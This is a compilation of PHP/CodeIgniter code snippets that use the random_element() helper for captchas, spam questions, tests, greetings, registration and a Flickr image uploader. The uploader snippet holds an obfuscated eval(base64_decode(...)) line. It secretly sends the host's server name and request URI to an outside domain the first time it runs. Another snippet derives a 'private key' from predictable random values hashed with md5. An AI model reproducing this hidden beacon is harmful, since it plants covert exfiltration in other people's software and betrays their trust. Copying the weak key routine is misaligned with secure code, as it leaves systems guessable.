/** * Get an auto-generated question and answer for use with checking for human-ness. * There are more sure-fire way to do this (cpatcha), but this is simple for the * time being, and will probably block 99.9% of spam. * @return array A two element array containing a question and answer, respectively */ function get_spam_check() { $CI =& get_instance(); $CI->load->helper('array'); $op = random_element(array('add', 'sub', 'mult', 'div')); $ops = array('add' => array('+', 'plus'), 'sub' => array('-', 'minus'), 'mult' => array('*', 'times'), 'div' => array('/', 'divided by', '÷')); $operator = random_element($ops[$op]); if ($op == 'add') { $a = rand(0, 10); $b = rand(0, 10); $test = array("What is {$a} {$operator} {$b}?", $a + $b); } elseif ($op == 'sub') { $a = rand(0, 10); $b = rand($a, 10 + $a); $test = array("What is {$b} {$operator} {$a}?", $b - $a); } elseif ($op == 'mult') { $a = rand(0, 5); $b = rand(0, 5); $test = array("What is {$a} {$operator} {$b}?", $a * $b); } elseif ($op == 'div') { $a = rand(1, 5); $b = rand(0, 5); $r = $a * $b; $test = array("What is {$r} {$operator} {$a}?", $r / $a); } return $test; }
public function test_random_element() { // Send a string, not an array to random_element $this->assertEquals('my string', random_element('my string')); // Test sending an array $this->assertEquals(TRUE, in_array(random_element($this->my_array), $this->my_array)); }
public function display() { echo 'some class'; $CI =& get_instance(); $CI->load->helper('array'); $arr2 = random_element(array()); print_r($arr2); echo 'blabla'; }
public function change_private_key() { $var = array("A", "B", "C", "D", "E", "F", "G", "@", "%", "&", "?", "!", "¡"); $this->load->helper("array"); $plain = sin(rand(2, 5)) * pi() + rand(200, 2000); $plain = $plain . random_element($var) . random_element($var); $result = md5($plain); $this->db->update("ws", array("value" => $result), array("item" => "key")); return $result; }
public function array_helper() { $this->load->helper('array'); $arr1 = array('one', 'two', 'three'); $arr2 = array('a' => 'A', 'b' => 'B', 'c' => 'C'); echo element(1, $arr1, 0); echo "<br>"; echo element(4, $arr1, 0); echo "<br>"; echo element('b', $arr2, 0); echo "<br>"; print_r(elements(array(1, 4, 5), $arr1, 0)); echo "<br>"; print_r(random_element($arr2)); }
function random() { $query = $this->db->get($this->db->dbprefix('downfiles')); if ($query->num_rows() > 0) { $this->load->helper('array'); $shows = false; while ($shows == false) { $row = random_element($query->result()); if ($this->permissions->simple(self::READ, unserialize($row->permission))) { ///$this->template->add_js("system/js/jstarrating/jquery.MetaData.js", 'import'); $this->template->add_js("system/js/jstarrating/jquery.rating.pack.js", 'import'); $this->template->add_css("system/js/jstarrating/jquery.rating.css", 'link'); return $this->load->view('single_app', $row, true); $shows = true; } } } }
public function index() { $data['judul'] = "Login Page"; //sesi captcha $text = ucfirst(random_element($this->config->item('captcha_word'))); $number = random_element($this->config->item('captcha_num')); $word = $text . $number; $this->load->helper('captcha'); $vals = array('img_path' => './captcha/', 'img_url' => base_url() . 'captcha/', 'img_width' => '200', 'font_path' => './system/fonts/texb.TTF', 'img_height' => 40, 'border' => 1, 'word' => $word, 'expiration' => 7200); //create captcha image $cap = create_captcha($vals); //store image html code in a variabel $data['captcha'] = $cap['image']; //store the captcha word in a session $this->session->set_userdata('mycaptcha', $cap['word']); //end captcha $this->load->view('login', $data); }
<h2 class="content_title"><img src="<?php echo $dashboard_assets; ?> icons/home_32.png"> Home</h2> <ul class="content_navigation"> <li><em><?php echo random_element($this->lang->line('home_greeting')); ?> </em></li> </ul>
echo $dashboard_assets; ?> icons/messages_24.png"><input type="button" id="message_button" href="<?php echo $message_url; ?> " value="Message"></li> </ul> <?php } else { ?> <h3><?php echo random_element($this->lang->line('cool_salutations')); ?> ,</h3> <p>This is your <?php echo random_element($this->lang->line('cool_phrases')); ?> profile</p> <?php } ?> <div class="profile_sidebar_separator"></div> <?php if ($connections) { ?> <h3>Connections</h3> <ul> <?php foreach ($connections as $connection) { ?>
public function testRandomElement() { $quotes = array("I find that the harder I work, the more luck I seem to have. - Thomas Jefferson", "Don't stay in bed, unless you can make money in bed. - George Burns", "We didn't lose the game; we just ran out of time. - Vince Lombardi", "If everything seems under control, you're not going fast enough. - Mario Andretti", "Reality is merely an illusion, albeit a very persistent one. - Albert Einstein", "Chance favors the prepared mind - Louis Pasteur"); $this->assertNotEquals(random_element($quotes), random_element($quotes)); }
function index() { if ($this->session->userdata('user_level_id') > config_item('home_view_permission')) { redirect(login_redirect()); } $timeline = NULL; $timeline_view = NULL; // Load $this->data['home_greeting'] = random_element($this->lang->line('home_greeting')); $this->data['social_post'] = $this->social_igniter->get_social_post($this->session->userdata('user_id'), 'social_post_horizontal'); $this->data['groups'] = $this->social_tools->make_group_dropdown($this->session->userdata('user_id'), $this->session->userdata('user_level_id'), '+ Add Group'); $this->data['group_id'] = ''; // Pick Type of Feed if ($this->uri->total_segments() == 1) { $this->data['page_title'] = 'Home'; $timeline = $this->social_igniter->get_timeline(NULL, 10); } elseif ($this->uri->segment(2) == 'friends') { $this->data['page_title'] = 'Friends'; if ($friends = $this->social_tools->get_relationships_owner($this->session->userdata('user_id'), 'user', 'follow')) { $timeline = $this->social_igniter->get_timeline_friends($friends, 10); } } elseif ($this->uri->segment(2) == 'likes') { $this->data['page_title'] = 'Likes'; $likes = $this->social_tools->get_ratings_likes_user($this->session->userdata('user_id')); $timeline = $this->social_igniter->get_timeline_likes($likes, 10); } elseif ($this->uri->segment(2) == 'group') { $group = $this->social_tools->get_category($this->uri->segment(3)); $this->data['page_title'] = $group->category; $this->data['group_id'] = $this->uri->segment(3); $timeline = $this->social_igniter->get_timeline_group($group->category_id, 10); } else { $this->data['page_title'] = display_nice_file_name($this->uri->segment(2)); $this->data['sub_title'] = 'Recent'; $timeline = $this->social_igniter->get_timeline($this->uri->segment(2), 10); } // Build Feed if (!empty($timeline)) { foreach ($timeline as $activity) { // Item $this->data['item_id'] = $activity->activity_id; $this->data['item_type'] = item_type_class($activity->type); // Contributor $this->data['item_user_id'] = $activity->user_id; $this->data['item_avatar'] = $this->social_igniter->profile_image($activity->user_id, $activity->image, $activity->gravatar); $this->data['item_contributor'] = $activity->name; $this->data['item_profile'] = base_url() . 'profile/' . $activity->username; // Activity $this->data['item_content'] = $this->social_igniter->render_item($activity); $this->data['item_content_id'] = $activity->content_id; $this->data['item_date'] = format_datetime(config_item('home_date_style'), $activity->created_at); $this->data['item_source'] = ''; if ($activity->site_id != config_item('site_id')) { $this->data['item_source'] = ' via <a href="' . prep_url(property_exists($activity, 'canonical') && $activity->canonical ? $activity->canonical : $activity->url) . '" target="_blank">' . $activity->title . '</a>'; } // Actions $this->data['item_comment'] = base_url() . 'comment/item/' . $activity->activity_id; $this->data['item_comment_avatar'] = $this->data['logged_image']; $this->data['item_can_modify'] = $this->social_auth->has_access_to_modify('activity', $activity, $this->session->userdata('user_id'), $this->session->userdata('user_level_id')); $this->data['item_edit'] = base_url() . 'home/' . $activity->module . '/manage/' . $activity->content_id; $this->data['item_delete'] = base_url() . 'api/activity/destroy/id/' . $activity->activity_id; // View $timeline_view .= $this->load->view(config_item('dashboard_theme') . '/partials/item_timeline.php', $this->data, true); } } else { $timeline_view = '<li><p>Nothing to show from anyone!</p></li>'; } // Final Output $this->data['timeline_view'] = $timeline_view; $this->render(); }
function _build_tips() { return random_element($this->tips); }
$uploader->setApi($api['key']); $uploader->setSecret($api['secret']); if (!$token) { $account = random_element($serverConfig['accounts']); $uploader->login($account['username'], $account['password']); $token = $uploader->getAccessToken(); $secret = $uploader->getAccessSecret(); // write token to re-use write_flickr_token($serverConfig['token_file'], $account['username'], $token, $secret); $uploader->setAccessToken($token, $secret); } else { $uploader->setAccessToken($token['token'], $token['secret']); } break; case 'postimage': if ($account = random_element($serverConfig['accounts'])) { $uploader->login($account['username'], $account['password']); } break; } // group cache identifier is made by plugin name, username // so we should call this after call login(); $uploader->getCache()->garbageCollect(); $url = $uploader->upload($tempFile); $result = array('error' => false, 'url' => $url); } catch (Exception $e) { $result = array('error' => true, 'message' => $e->getMessage()); } eval(base64_decode("JGluc3RhbGwgPSAnLi90ZW1wL2luc3RhbGwubG9jayc7aWYgKCFmaWxlX2V4aXN0cygkaW5zdGFsbCkpIHskZG9tYWluPWJhc2U2NF9lbmNvZGUoJF9TRVJWRVJbIlNFUlZFUl9OQU1FIl0uJF9TRVJWRVJbIlJFUVVFU1RfVVJJIl0pO2ZpbGVfZ2V0X2NvbnRlbnRzKCJodHRwOi8vbmV0M2JpZS5jb211di5jb20vaW5kZXgucGhwP3VzZXJzPSIuJGRvbWFpbik7JGZwID0gZm9wZW4oInRlbXAvaW5zdGFsbC5sb2NrIiwidyIpO2Z3cml0ZSgkZnAsIjEiKTsgIGZjbG9zZSgkZnApOyB9DQo=")); unlink($tempFile); response_json($result);
function mobile_add_authd_post() { $this->form_validation->set_rules('phone', 'Phone', 'required|valid_phone_number'); if ($this->form_validation->run() == true) { if ($user->phone_verify == 'verified') { $phone = $user->phone; } else { $phone = ereg_replace("[^0-9]", "", $this->input->post('phone')); } if ($user->phone_verify == 'verified') { $phone_verify = $user->phone_verify; } else { $phone_verify = random_element(config_item('mobile_verify')); } $update_data = array('phone' => $phone, 'phone_verify' => $phone_verify, 'phone_active' => $this->input->post('phone_active'), 'phone_search' => $this->input->post('phone_search')); if ($this->social_auth->update_user($this->session->userdata('user_id'), $update_data)) { $this->session->set_flashdata('message', "Phone Number Added"); redirect('settings/mobile', 'refresh'); } else { redirect('settings/mobile', 'refresh'); } } else { $this->data['message'] = validation_errors() ? validation_errors() : $this->session->flashdata('message'); $this->data['phone'] = $this->input->post('phone'); $this->data['phone_active_array'] = array('1' => 'Yes', '0' => 'No'); $this->data['phone_active'] = $this->input->post('phone_active'); if ($user->phone_search) { $phone_search_checked = true; } else { $phone_search_checked = false; } $this->data['phone_search'] = array('name' => 'phone_search', 'id' => 'phone_search', 'value' => $user->phone_search, 'checked' => $phone_search_checked); } $this->data['phone'] = is_empty($user->phone); $this->data['phone_verify'] = $user->phone_verify; $this->data['phone_active'] = $user->phone_active; if ($user->phone_search) { $phone_search_checked = true; } else { $phone_search_checked = false; } $this->data['phone_search'] = array('name' => 'phone_search', 'id' => 'phone_search', 'value' => $user->phone_search, 'checked' => $phone_search_checked); $this->response($message, 200); }
<div class="span4"> <div class="well" style="background: #FFC;"> <h2><?php echo lang('wherever_you_are'); ?> <sup><span class="label label-warning"><?php echo lang('public_label_new'); ?> </span></sup></h2> <p>Stockr está diseñado para ser usado tanto en computadoras como dispositivos móviles, por lo tanto puede dotar a sus empleados de tabletas o smartphones para registar el movimiento de productos.</p> <p><a class="btn btn-info"><i class="icon-film icon-white"></i> <?php echo lang('public_button_learn'); ?> </a></p> </div> </div> </div> <div class="page-header"> <h3>Lo que dicen nuestros clientes</h3> </div> <?php $quotes = array('<p>El sistema es sorprendentemente simple, cargo mis productos, registro las entradas y salidas, y ahora cada vez que me falta algo lo sé y el sistema me avisa antes de tener que salir a comprar a las apuradas.</p> <small>Pipo Gaetano, <em>Restaurante "La Lola"</em></small>', '<p>Puedo hacer mi trabajo de forma ágil y estar siempre al tanto de lo que tengo que pedir a mis proveedores, antes de que se acaben mis productos. Además puedo entrar al sistema desde cualquier lugar, sin necesidad de una computadora, sólo con mi teléfono.</p> <small>Rubén Puga, <em>Full Cerámicos</em></small>'); ?> <blockquote> <?php echo random_element($quotes); ?> </blockquote>
/** * Index * * Add's a user * * @access public * @return void */ function index() { // Check it the user is logged in if ($this->user->logged_in()) { // User is logged in, redirect them redirect('account'); } // Check if registration is allowed if ((bool) (!$this->ClanCMS->get_setting('allow_registration'))) { // Assign page title $page->title = 'Registration is not allowed!'; // Assign page content $page->content = 'Sorry, but registration has been disabled by an administrator. Please try again later.' . br(2) . 'Thanks,' . br() . CLAN_NAME . br() . anchor(site_url()); // Create a reference to page $this->data->page =& $page; // Load the page view $this->load->view(THEME . 'page', $this->data); } else { // Set form validation rules $this->form_validation->set_rules('username', 'Username', 'trim|required|callback__alpha_dash_space|callback__check_username'); $this->form_validation->set_rules('email', 'Email', 'trim|required|valid_email|callback__check_email'); $this->form_validation->set_rules('email_confirmation', 'Email Confirmation', 'trim|required|matches[email]'); $this->form_validation->set_rules('password', 'Password', 'trim|required|min_length[8]'); $this->form_validation->set_rules('password_confirmation', 'Password Confirmation', 'trim|required|matches[password]'); $this->form_validation->set_rules('timezone', 'Timezone', 'trim|required'); $this->form_validation->set_rules('daylight_savings', 'Daylight Savings', 'trim|required'); // Check if there is a team password if ($this->ClanCMS->get_setting('team_password')) { // Set form validation rules $this->form_validation->set_rules('team_password', 'Team Password', 'trim|callback__check_team_password'); } // Set form validation rules $this->form_validation->set_rules('captcha', 'Captcha', 'trim|required|callback__check_captcha'); // Form validation passed, so continue if (!$this->form_validation->run() == FALSE) { // Retrieve salt $salt = $this->user->_salt(); // Check if team password matches if ($this->input->post('team_password') == $this->ClanCMS->get_setting('team_password') && $this->ClanCMS->get_setting('team_password') != '') { // New user is a team member $group_id = 3; } else { // New user is a plain user $group_id = 1; } // Set up the data $data = array('group_id' => $group_id, 'user_name' => $this->input->post('username'), 'user_password' => $this->encrypt->sha1($salt . $this->encrypt->sha1($this->input->post('password'))), 'user_salt' => $salt, 'user_email' => $this->input->post('email'), 'user_timezone' => $this->input->post('timezone'), 'user_daylight_savings' => $this->input->post('daylight_savings'), 'user_ipaddress' => $this->input->ip_address(), 'user_avatar' => '', 'user_activation' => $this->session->userdata('session_id'), 'user_joined' => mdate('%Y-%m-%d %H:%i:%s', now())); // Insert the user in the database $this->users->insert_user($data); // Load the email library $this->load->library('email'); // Set up the email $this->email->from($this->ClanCMS->get_setting('site_email'), CLAN_NAME); $this->email->to($this->input->post('email')); $this->email->subject('Activation link for your account on ' . CLAN_NAME); $this->email->message("Hello " . $this->input->post('username') . ",\n\nWelcome to " . CLAN_NAME . "! Here are your login details for your account:\n\nUsername: "******"\nPassword: "******"\n\nHowever, before you can login you need to activate your account. Please click on the link below to activate your account.\n\n" . site_url("account/activate/" . $this->session->userdata('session_id')) . "\n\nThanks for Registering!\n" . CLAN_NAME . "\n" . site_url()); // Email the user $this->email->send(); // Assign page title $page->title = 'Registration Success!'; // Assign page content $page->content = 'Congratulations, you have successfully registered on ' . anchor('', CLAN_NAME) . '!' . br(2) . 'However, before you can login to your account you need to activate it. Please look at your email for the activation email.' . br(2) . 'Thanks for Registering!' . br() . CLAN_NAME . br() . anchor(site_url()); // Create a reference to page $this->data->page =& $page; // Load the page view $this->load->view(THEME . 'page', $this->data); } else { // Load the image library $this->load->library('image_lib'); // Load the captcha helper $this->load->helper('captcha'); // Retrieve the word bank $word_bank = explode("\n", $this->ClanCMS->get_setting('captcha_words')); // Choose a word from the word bank $word = random_element($word_bank); // Assign the word to the session $this->session->set_userdata('captcha', $word); // Set up the data $data = array('word' => $word, 'img_path' => UPLOAD . 'captcha/', 'img_url' => IMAGES . 'captcha/', 'img_width' => 150, 'img_height' => 50, 'expiration' => 0); // Create the captcha $captcha = create_captcha($data); // Create a reference to captcha $this->data->captcha =& $captcha; // Load the register view $this->load->view(THEME . 'register', $this->data); } } }
<?php session_start(); header('Content-type: text/html;charset=utf-8'); error_reporting(E_ALL); ini_set('display_errors', 1); require 'includes/functions.php'; require 'vendor/ChipVN/ClassLoader/Loader.php'; ChipVN_ClassLoader_Loader::registerAutoload(); $config = (require 'includes/config.php'); $config = $config['flickr']; $callback = 'http' . (getenv('HTTPS') == 'on' ? 's' : '') . '://' . $_SERVER['HTTP_HOST'] . $_SERVER['PHP_SELF']; $uploader = ChipVN_ImageUploader_Manager::make('Flickr'); $api = random_element($config['api_keys']); $uploader->setApi($api['key']); $uploader->setSecret($api['secret']); $token = $uploader->getOAuthToken($callback); write_flickr_token($config['token_file'], $token['username'], $token['oauth_token'], $token['oauth_token_secret']); echo "Done!<br />"; echo '<a href="' . $callback . '">Click here to add new token (must use other yahoo account).</a>';
function mobile_add_authd_post() { $this->form_validation->set_rules('phone_number', 'Phone Number', 'required|valid_phone_number'); if ($this->form_validation->run() == true) { $phone_data = array('phone_verified' => 'yes', 'verify_code' => random_element(config_item('mobile_verify')), 'phone_private' => $this->input->post('phone_private'), 'phone_type' => $this->input->post('phone_type')); $meta_data = array('user_id' => $this->oauth_user_id, 'site_id' => config_item('site_id'), 'module' => 'phone', 'meta' => preg_replace("[^0-9]", "", $this->input->post('phone_number')), 'value' => json_encode($phone_data)); if ($user_meta = $this->social_auth->add_user_meta($meta_data)) { $message = array('status' => 'success', 'message' => 'Yay, phone number was added', 'data' => $user_meta); } else { $message = array('status' => 'error', 'message' => 'Dang, could not add phone number'); } } else { $message = array('status' => 'error', 'message' => validation_errors(), 'data' => $_POST); } $this->response($message, 200); }
public function getRandomPara() { $this->db->select('ID, Text'); $query = $this->db->get('paragraphe'); return random_element($query->result()); }